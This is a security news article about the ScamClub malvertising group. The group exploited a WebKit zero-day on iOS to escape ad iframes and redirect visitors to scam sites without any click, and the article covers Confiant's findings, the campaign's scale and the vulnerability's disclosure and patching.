An unpatched zero-day vulnerability in WebKit-based browsers has been exploited by a threat group to redirect website visitors to scam sites for at least 8 months, according to a new report released by cybersecurity firm Confiant.
The threat group behind the attack – ScamClub – has been in operation since at least 2018 and primarily uses malicious adverts (malvertising) to direct Internet users to scam sites, often sites running online gift card scams. The malicious adverts are submitted through ad networks and are served to website visitors through ad blocks on legitimate websites. These ad blocks are used on many legitimate websites as a way to increase website revenue.
The gang submits huge numbers of malicious adverts, most of which are identified and rejected by the ad networks, but the high volume of submitted adverts means some of the malicious adverts bypass the ad networks’ security controls and are displayed on websites that use the ad blocks to generate revenue.
The latest campaign has seen the threat group get over 50 million impressions for its malicious adverts over the past 90 days, with low level activity followed by manic bursts of activity, according to Confiant. On some days in the past three months the gang had more than 16 million ad impressions.
This campaign targeted iOS users, with the exploited vulnerability in the WebKit engine used by browsers such as Safari and Chrome for iOS. Most malvertising campaigns require a user to click on one of the adverts in order for them to be redirected to a malicious website. The zero-day vulnerability allowed the threat group to redirect website visitors with no user interaction required.
The exploited vulnerability allowed the threat group to escape the iframe HTML element of the sandboxing feature of the WebKit engine, which is a security measure that is supposed to prevent ad code from interacting with the underlying website. This security feature ensures that users are not redirected to other sites unless the user clicks on the advert contained within the iframe. Confiant discovered that the flaw used an event listener for a message event. If the listener detected the message, the user would be redirected to the scam site even if they did not click on the advert contained within the iframe.
What made this campaign effective is the sheer volume of ad impressions ScamClub was generating. “Combined with ScamClub’s large volumes and broad targeting that hits dozens of different websites, it’s all about the increased efficacy of spawning a successful redirect — even if we’re talking about a single digit percentage increase, that can mean tens of thousands of impacted impressions over the duration of a single campaign,” said Confiant.
Confiant reported the vulnerability to Apple and Google in June 2020 and a patch was issued to correct the flaw in December 2020. An update has now been made to the Safari browser for macOS and iOS to prevent the vulnerability from being exploited.